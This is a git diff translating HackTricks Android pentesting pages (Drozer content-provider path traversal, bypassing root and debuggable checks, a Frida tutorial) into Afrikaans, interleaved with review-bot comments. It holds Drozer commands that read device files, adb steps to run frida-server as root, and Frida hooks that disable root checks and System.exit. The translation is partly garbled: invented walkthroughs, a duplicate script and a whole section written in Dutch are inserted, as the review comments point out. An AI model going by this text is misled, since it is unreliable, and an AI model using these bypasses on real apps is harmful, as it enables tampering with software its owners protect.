-dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts +dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 127.0.0.1 localhost ``` +**Outomatiese Ontdekking van Paddeurdringendheid deur Drozer** -**Automatic Path Traversal discovery by Drozer** +Drozer is 'n kragtige hulpmiddel wat gebruik kan word vir die outomatiese ontdekking van paddeurdringendheid in Android-toepassings. Dit kan gebruik word om kwesbaarhede in inhoudsverskaffers te identifiseer en uit te buit. Hier is 'n stap-vir-stap handleiding oor hoe om Drozer te gebruik vir die outomatiese ontdekking van paddeurdringendheid: +1. Installeer Drozer op jou toestel of virtuele masjien. +2. Begin Drozer en maak 'n verbinding met die teiken-toepassing. +3. 
Gebruik die `run app.provider.find` bevel om alle inhoudsverskaffers in die teiken-toepassing te vind. +4. Analiseer die resultate en soek na enige kwesbaarhede of potensiële paddeurdringendheid. +5. As 'n kwesbaarheid gevind word, kan jy die `run app.provider.query` bevel gebruik om data uit die inhoudsverskaffer te onttrek. +6. Analiseer die onttrekte data en identifiseer enige sensitiewe inligting wat moontlik gelekte kan word. +7. Gebruik die gevonde kwesbaarhede om toegang tot beperkte data of funksies in die teiken-toepassing te verkry. + +Drozer is 'n kragtige hulpmiddel wat jou kan help om paddeurdringendheid in Android-toepassings te ontdek en uit te buit. Dit is belangrik om hierdie tegnieke verantwoordelik en wettig te gebruik, en slegs op toepassings waarvoor jy toestemming het om te toets. ``` -dz> run scanner.provider.traversal -a com.mwr.example.sieve -Scanning com.mwr.example.sieve... +dz> run scanner.provider.traversal -a com.mwr.example.sieve +Scanning com.mwr.example.sieve... Vulnerable Providers: - content://com.mwr.example.sieve.FileBackupProvider/ - content://com.mwr.example.sieve.FileBackupProvider +content://com.mwr.example.sieve.FileBackupProvider/ +content://com.mwr.example.sieve.FileBackupProvider ``` - -## References +## Verwysings * [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android\_content\_providers.htm) * [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/) @@ -213,14 +234,14 @@ Vulnerable Providers:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
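Review bot: Most of the added text in this hunk is new material rather than translation and should be dropped. Under `+**Outomatiese SQLInjection-ontdekking deur Drozer**` the hunk inserts an introductory paragraph, a five-step walkthrough (`drozer console connect`, `run app.provider.find`, a `run app.provider.query content:// --projection --selection --selectionArgs` line whose placeholders are empty as shown, with `Vervang `` met die URI ...` referring to them) and a closing paragraph; under `+**Outomatiese Ontdekking van Paddeurdringendheid deur Drozer**` it inserts a seven-step list and a closing paragraph. The removed English lines `-**Automatic SQLInjection discovery by Drozer**` and `-**Automatic Path Traversal discovery by Drozer**` were bare captions followed directly by the `dz> run scanner.provider.injection` / `scanner.provider.traversal` output, and the translated captions should be too. The fenced Drozer output is also altered: indented result lines such as `- content://com.mwr.example.sieve.DBContentProvider/Keys/` and `- android_metadata` come back as `+content://...` and `+android_metadata` with the leading whitespace stripped, and lines like `dz> run app.provider.query ... --selection "'"` appear as a remove/add pair with no visible difference, which is trailing-whitespace churn; a translation should leave tool output inside fences byte-for-byte. Terminology is inconsistent within the hunk (`### **Pad Traversal**` versus `Paddeurdringendheid`, `Inhoudverskaffers` versus `Inhoudsverskaffers`); pick one form of each.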
diff --git a/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md index 96d16dee0..0b0ae2d5e 100644 --- a/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md +++ b/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md @@ -1,108 +1,88 @@ -# Exploiting a debuggeable application +# Uitbuiting van 'n toepassing wat gedebug kan word
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# **Bypassing root and debuggeable checks** +# **Om die wortel- en gedebug kan word kontroles te omseil** -This section of the post is a summary from the post [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) +Hierdie gedeelte van die pos is 'n opsomming van die pos [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) -## Steps to Make an Android App Debuggable and Bypass Checks +## Stappe om 'n Android-toepassing gedebug kan word te maak en kontroles te omseil -### **Making the App Debuggable** +### **Maak die toepassing gedebug kan word** -Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0 +Inhoud gebaseer op https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0 -1. **Decompile the APK:** - - Utilize the APK-GUI tool for decompiling the APK. - - In the _android-manifest_ file, insert `android:debuggable=true` to enable debugging mode. - - Recompile, sign, and zipalign the modified application. +1. **Ontbind die APK:** +- Gebruik die APK-GUI-hulpmiddel om die APK te ontbind. +- Voeg `android:debuggable=true` by in die _android-manifest_-lêer om die gedebug-modus te aktiveer. +- Hersaam, teken en zipalign die gewysigde toepassing. -2. **Install the Modified Application:** - - Use the command: `adb install `. +2. **Installeer die Gewysigde Toepassing:** +- Gebruik die opdrag: `adb install `. -3. **Retrieve the Package Name:** - - Execute `adb shell pm list packages –3` to list third-party applications and find the package name. +3. 
**Haal die Pakketnaam op:** +- Voer `adb shell pm list packages –3` uit om derdeparty-toepassings te lys en die pakketnaam te vind. -4. **Set the App to Await Debugger Connection:** - - Command: `adb shell am setup-debug-app –w `. - - **Note:** This command must be run each time before starting the application to ensure it waits for the debugger. - - For persistence, use `adb shell am setup-debug-app –w -–persistent `. - - To remove all flags, use `adb shell am clear-debug-app `. +4. **Stel die Toepassing in om op die gedebugger se verbinding te wag:** +- Opdrag: `adb shell am setup-debug-app –w `. +- **Let op:** Hierdie opdrag moet elke keer uitgevoer word voordat die toepassing begin om te verseker dat dit wag vir die gedebugger. +- Vir volharding, gebruik `adb shell am setup-debug-app –w -–persistent `. +- Om alle vlae te verwyder, gebruik `adb shell am clear-debug-app `. -5. **Prepare for Debugging in Android Studio:** - - Navigate in Android Studio to _File -> Open Profile or APK_. - - Open the recompiled APK. +5. **Maak gereed vir gedebugging in Android Studio:** +- Navigeer in Android Studio na _File -> Open Profile or APK_. +- Maak die hersaamde APK oop. -6. **Set Breakpoints in Key Java Files:** - - Place breakpoints in `MainActivity.java` (specifically in the `onCreate` method), `b.java`, and `ContextWrapper.java`. +6. **Stel breekpunte in sleutel Java-lêers:** +- Plaas breekpunte in `MainActivity.java` (spesifiek in die `onCreate`-metode), `b.java`, en `ContextWrapper.java`. -### **Bypassing Checks** +### **Kontroles omseil** -The application, at certain points, will verify if it is debuggable and will also check for binaries indicating a rooted device. The debugger can be used to modify app info, unset the debuggable bit, and alter the names of searched binaries to bypass these checks. +Die toepassing sal op sekere punte verifieer of dit gedebug kan word en sal ook kyk vir binêre lêers wat dui op 'n gewortelde toestel. 
Die gedebugger kan gebruik word om toepassingsinligting te wysig, die gedebugbare bit te verwyder, en die name van gesoekte binêre lêers te verander om hierdie kontroles te omseil. -For the debuggable check: +Vir die gedebug-klank: -1. **Modify Flag Settings:** - - In the debugger console's variable section, navigate to: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`. - - **Note:** The binary representation of `flags = 814267974` is `11000011100111011110`, indicating that the "Flag_debuggable" is active. +1. **Verander vlae-instellings:** +- In die veranderlike-afdeling van die gedebugger se konsole, navigeer na: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`. +- **Let op:** Die binêre voorstelling van `flags = 814267974` is `11000011100111011110`, wat aandui dat die "Flag_debuggable" aktief is. -![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png) +![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png) -These steps collectively ensure that the application can be debugged and that certain security checks can be bypassed using the debugger, facilitating a more in-depth analysis or modification of the application's behavior. +Hierdie stappe verseker gesamentlik dat die toepassing gedebug kan word en dat sekere sekuriteitskontroles omseil kan word deur die gedebugger te gebruik, wat 'n meer diepgaande analise of wysiging van die toepassing se gedrag fasiliteer. -Step 2 involves changing a flag value to 814267972, which is represented in binary as 110000101101000000100010100. +Stap 2 behels die verandering van 'n vlaewaarde na 814267972, wat binêr voorgestel word as 110000101101000000100010100. -# **Exploiting a Vulnerability** +# **Uitbuiting van 'n kwesbaarheid** -A demonstration was provided using a vulnerable application containing a button and a textview. 
Initially, the application displays "Crack Me". The aim is to alter the message from "Try Again" to "Hacked" at runtime, without modifying the source code. +'n Demonstrasie is verskaf met behulp van 'n kwesbare toepassing wat 'n knoppie en 'n teksvak bevat. Aanvanklik vertoon die toepassing "Crack Me". Die doel is om die boodskap van "Try Again" na "Hacked" te verander tydens uitvoering, sonder om die bronkode te wysig. -## **Checking for Vulnerability** -- The application was decompiled using `apktool` to access the `AndroidManifest.xml` file. -- The presence of `android_debuggable="true"` in the AndroidManifest.xml indicates the application is debuggable and susceptible to exploitation. -- It's worth noting that `apktool` is employed solely to check the debuggable status without altering any code. +## **Kontrole vir Kwesbaarheid** +- Die toepassing is ontbind met behulp van `apktool` om toegang te verkry tot die `AndroidManifest.xml`-lêer. +- Die teenwoordigheid van `android_debuggable="true"` in die AndroidManifest.xml dui daarop dat die toepassing gedebug kan word en vatbaar is vir uitbuiting. +- Dit is die moeite werd om op te merk dat `apktool` slegs gebruik word om die gedebugbare status te kontroleer sonder om enige kode te wysig. -## **Preparing the Setup** -- The process involved initiating an emulator, installing the vulnerable application, and using `adb jdwp` to identify Dalvik VM ports that are listening. -- The JDWP (Java Debug Wire Protocol) allows debugging of an application running in a VM by exposing a unique port. -- Port forwarding was necessary for remote debugging, followed by attaching JDB to the target application. +## **Die Opstel Voorberei** +- Die proses behels die begin van 'n emulator, die installeer van die kwesbare toepassing, en die gebruik van `adb jdwp` om Dalvik VM-poorte wat luister te identifiseer. 
+- Die JDWP (Java Debug Wire Protocol) maak dit moontlik om 'n toepassing wat in 'n VM loop te debug deur 'n unieke poort bloot te stel. +- Poort deurstuur was nodig vir afstandsbediening, gevolg deur die koppel van JDB aan die teiken-toepassing. -## **Injecting Code at Runtime** -- The exploitation was carried out by setting breakpoints and controlling the application flow. -- Commands like `classes` and `methods ` were used to uncover the application’s structure. -- A breakpoint was set at the `onClick` method, and its execution was controlled. -- The `locals`, `next`, and `set` commands were utilized to inspect and modify local variables, particularly changing the "Try Again" message to "Hacked". -- The modified code was executed using the `run` command, successfully altering the application’s output in real-time. +## **Kode inspuiting tydens uitvoering** +- Die uitbuiting is uitgevoer deur breekpunte te stel en die toepassing se vloei te beheer. +- Opdragte soos `classes` en `methods ` is gebruik om die struktuur van die toepassing te ondersoek. +- 'n Breekpunt is gestel by die `onClick`-metode, en die uitvoering daarvan is beheer. +- Die opdragte `locals`, `next`, en `set` is gebruik om plaaslike veranderlikes te ondersoek en te wysig, veral deur die "Try Again" boodskap na "Hacked" te verander. +- Die gewysigde kode is uitgevoer met behulp van die `run`-opdrag, wat die toepassing se uitset suksesvol in werklike tyd verander het. -This example demonstrated how the behavior of a debuggable application can be manipulated, highlighting the potential for more complex exploits like gaining shell access on the device in the application's context. 
- - - -## References -* [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) -* [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications) - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+Hierdie voorbeeld het gedemonstreer hoe die gedrag van 'n toepassing wat gedebug kan word, gemanipuleer kan word, en beklemtoon die potensiaal vir meer komple diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md index 3d0507e1e..c23ddb6b0 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md @@ -1,80 +1,75 @@ -# Frida Tutorial +# Frida Tutoriaal
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## Installation - -Install **frida tools**: +## Installasie +Installeer **frida-gereedskap**: ```bash pip install frida-tools pip install frida ``` - -**Download and install** in the android the **frida server** ([Download the latest release](https://github.com/frida/frida/releases)).\ -One-liner to restart adb in root mode, connect to it, upload frida-server, give exec permissions and run it in backgroud: +**Laai af en installeer** die **frida-bediener** in die Android-toestel ([Laai die nuutste vrystelling af](https://github.com/frida/frida/releases)).\ +Eenreël om adb in root-modus te herlaai, daarmee te verbind, frida-server op te laai, uitvoeringsregte te gee en dit agtergrond te laat loop: {% code overflow="wrap" %} ```bash -adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &" +adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &" ``` {% endcode %} -**Check** if it is **working**: - +**Kyk** of dit **werk**: ```bash frida-ps -U #List packages and processes frida-ps -U | grep -i #Get all the package name ``` +## Tutoriale -## Tutorials +### [Tutoriaal 1](frida-tutorial-1.md) -### [Tutorial 1](frida-tutorial-1.md) - 
-**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ +**Vanaf**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ **APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\ -**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) +**Bronkode**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) -**Follow the [link to read it](frida-tutorial-1.md).** +**Volg die [skakel om dit te lees](frida-tutorial-1.md).** -### [Tutorial 2](frida-tutorial-2.md) +### [Tutoriaal 2](frida-tutorial-2.md) -**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Parts 2, 3 & 4)\ -**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) +**Vanaf**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Dele 2, 3 & 4)\ +**APK's en Bronkode**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) -**Follow the[ link to read it.](frida-tutorial-2.md)** +**Volg die [skakel om dit te lees](frida-tutorial-2.md).** -### [Tutorial 3](owaspuncrackable-1.md) +### [Tutoriaal 3](owaspuncrackable-1.md) -**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ +**Vanaf**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) -**Follow the [link to read 
it](owaspuncrackable-1.md).** +**Volg die [skakel om dit te lees](owaspuncrackable-1.md).** -**You can find more Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) +**Jy kan meer Awesome Frida-skripte hier vind:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) -## Quick Examples - -### Calling Frida from command line +## Vinnige Voorbeelde +### Frida vanaf die opdraglyn aanroep ```bash frida-ps -U 
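Review bot: In the frida-tutorial/README.md header hunk, `Installeer **frida-gereedskap**:` loses the reference to the package the next line installs (`pip install frida-tools`); keep `frida-tools` as the name. The one-liner `adb root; adb connect localhost:6000; ...` inside the `{% code %}` block appears as a remove/add pair with no visible change, so it is whitespace churn in a code block, and `dit agtergrond te laat loop` needs `in die agtergrond`. The blank lines that separated headings, paragraphs and fences in the English (`-## Installation`, blank, `-Install **frida tools**:`, blank, fence) are removed throughout the hunk; the markdown still renders, but the source layout should be preserved. The support footer is also worded differently from the copy in exploiting-a-debuggeable-applciation.md earlier in this patch (`hacktruuks` / `github-repos` here versus `haktruuks` / `GitHub-opslagplekke` there); use one wording for the shared boilerplate.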
@@ -87,9 +82,48 @@ frida -U --no-pause -l disableRoot.js -f owasp.mstg.uncrackable1 #frozen so that the instrumentation can occur, and the automatically #continue execution with our modified code. ``` +### Basiese Python-skrips -### Basic Python Script +```python +import frida +# Device +device = frida.get_usb_device() + +# Application +application = device.get_frontmost_application() +pid = application.pid + +# Session +session = device.attach(pid) + +# Script +script = session.create_script(""" +console.log('Hello, world!'); +""") + +# Load script +script.load() + +# Detach session +session.detach() +``` + +Hierdie is 'n basiese Python-skrips wat gebruik kan word met die Frida-raamwerk vir Android-app-pentesting. + +Die skrips maak gebruik van die `frida`-biblioteek om met die toestel te kommunikeer en die toepassing te ondersoek. + +Die skrips begin deur die toestel te kry wat aan die rekenaar gekoppel is deur die `frida.get_usb_device()`-funksie te gebruik. + +Dan word die voorste toepassing op die toestel gekry deur die `device.get_frontmost_application()`-funksie te gebruik. Die proses-ID (pid) van die toepassing word ook verkry. + +'n Sessie word geheg aan die toepassing deur die `device.attach(pid)`-funksie te gebruik. + +'n Skrips word geskep deur die `session.create_script()`-funksie te gebruik. Die skrips bevat 'n eenvoudige drukopdrag wat die boodskap "Hello, world!" na die konsole stuur. + +Die skrips word gelaai deur die `script.load()`-funksie te gebruik. + +Uiteindelik word die sessie losgemaak deur die `session.detach()`-funksie te gebruik. ```python import frida, sys 
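Review bot: The `### Basiese Python-skrips` section now carries a second, newly written script and nine explanatory paragraphs that have no counterpart in the source: the removed `-### Basic Python Script` line was followed directly by the existing `import frida, sys` block, which is kept as context below the insertion. The inserted script (`frida.get_usb_device()`, `get_frontmost_application()`, `attach(pid)`, a `console.log('Hello, world!')` script, then `session.detach()`) only attaches and detaches and duplicates what the original example already shows; drop it together with the paragraphs, and restore the blank line between the closing fence and the translated heading as in the original.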
@@ -100,138 +134,306 @@ print('[ * ] Running Frida Demo application') script.load() sys.stdin.read() ``` +### Hooking funksies sonder parameters -### Hooking functions without parameters - -Hook the function `a()` of the class `sg.vantagepoint.a.c` - +Haak die funksie `a()` van die klas `sg.vantagepoint.a.c` ```javascript Java.perform(function () { ; rootcheck1.a.overload().implementation = function() { - rootcheck1.a.overload().implementation = function() { - send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); - return false; - }; +rootcheck1.a.overload().implementation = function() { +send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); +return false; +}; +}); +``` +# Frida - Handleiding + +Hier is een korte handleiding over het gebruik van Frida om de `exit()`-methode in Java te hooken. + +## Stap 1: Installatie + +Installeer Frida op uw apparaat. U kunt de Frida-instructies volgen op de officiële website van Frida. + +## Stap 2: Voorbereiding + +Zorg ervoor dat u de benodigde bestanden en hulpmiddelen heeft: + +- De APK van de app die u wilt pentesten. +- Een Android-apparaat of emulator. +- Een teksteditor om het Frida-script te maken. + +## Stap 3: Frida-script maken + +Maak een nieuw bestand met de extensie `.js` en voeg de volgende code toe: + +```javascript +Java.perform(function() { + var System = Java.use('java.lang.System'); + System.exit.implementation = function() { + console.log('exit() is called'); + }; }); ``` -Hook java `exit()` +## Stap 4: Frida-script uitvoeren +Voer het Frida-script uit met behulp van de volgende opdracht: + +```bash +frida -U -l script.js -f +``` + +Vervang `` door de naam van het pakket van de app die u wilt pentesten. + +## Stap 5: Testen + +Start de app op uw apparaat of emulator en voer de actie uit die de `exit()`-methode aanroept. U zou een bericht moeten zien in de console waarin staat dat `exit()` wordt aangeroepen. 
+ +## Conclusie + +Met behulp van Frida kunt u de `exit()`-methode in Java hooken en controleren wanneer deze wordt aangeroepen. Dit kan handig zijn bij het pentesten van Android-apps om verdachte of ongewenste gedragingen te identificeren. ```javascript var sysexit = Java.use("java.lang.System"); - sysexit.exit.overload("int").implementation = function(var_0) { - send("java.lang.System.exit(I)V // We avoid exiting the application :)"); - }; +sysexit.exit.overload("int").implementation = function(var_0) { +send("java.lang.System.exit(I)V // We avoid exiting the application :)"); +}; +``` +# Frida Tutorial: Hook MainActivity `.onStart()` & `.onCreate()` + +In hierdie tutoriaal sal ons leer hoe om die `.onStart()` en `.onCreate()` metodes van die `MainActivity` klas in 'n Android-toepassing te hak. + +## Stap 1: Verstaan die doel + +Die `.onStart()` en `.onCreate()` metodes word opgeroep wanneer 'n aktiwiteit in Android begin en geskep word. Deur hierdie metodes te hak, kan ons die uitvoering van die toepassing beïnvloed en insette of uitsette manipuleer. + +## Stap 2: Installeer Frida + +Om te begin, moet ons Frida op ons toestel installeer. Volg die instruksies in die [Frida-dokumentasie](https://frida.re/docs/installation/) om dit te doen. + +## Stap 3: Skryf die skripsie + +Ons sal 'n eenvoudige Frida-skripsie skryf om die `.onStart()` en `.onCreate()` metodes te hak. Hier is die skripsie: + +```javascript +Java.perform(function () { + var MainActivity = Java.use('com.example.MainActivity'); + + MainActivity.onStart.implementation = function () { + console.log('MainActivity.onStart() gehak!'); + this.onStart(); + }; + + MainActivity.onCreate.implementation = function (savedInstanceState) { + console.log('MainActivity.onCreate() gehak!'); + this.onCreate(savedInstanceState); + }; +}); ``` -Hook MainActivity `.onStart()` & `.onCreate()` +## Stap 4: Voer die skripsie uit +Om die skripsie uit te voer, moet ons Frida gebruik om dit aan die toepassing te heg. 
Voer die volgende opdrag in die opdraglyn in: + +```bash +frida -U -l -f +``` + +Vervang `` met die pad na jou skripsie-lêer en `` met die naam van die toepassing se pakkie. + +## Stap 5: Monitor die uitset + +Nou kan ons die toepassing uitvoer en die uitset monitor om te sien of die `.onStart()` en `.onCreate()` metodes gehak word. As alles reg verloop, sal ons die gehakte boodskappe in die uitset sien. + +## Stap 6: Manipuleer die toepassing + +Met die `.onStart()` en `.onCreate()` metodes gehak, kan ons nou die toepassing manipuleer deur insette te verander of uitsette te onderskep. Hierdie tegniek kan gebruik word om sekuriteitslekke te identifiseer en te misbruik. + +## Stap 7: Opruiming + +As jy klaar is met die hak van die toepassing, kan jy die Frida-skripsie verwyder en die oorspronklike toestand van die toepassing herstel. + +## Slotwoord + +Met behulp van Frida kan ons die `.onStart()` en `.onCreate()` metodes van die `MainActivity` klas in 'n Android-toepassing hak. Hierdie tegniek stel ons in staat om die toepassing te manipuleer en sekuriteitslekke te identifiseer. Onthou egter dat die gebruik van hierdie tegniek slegs toegelaat word in wettige en etiese pentesting-scenarios. 
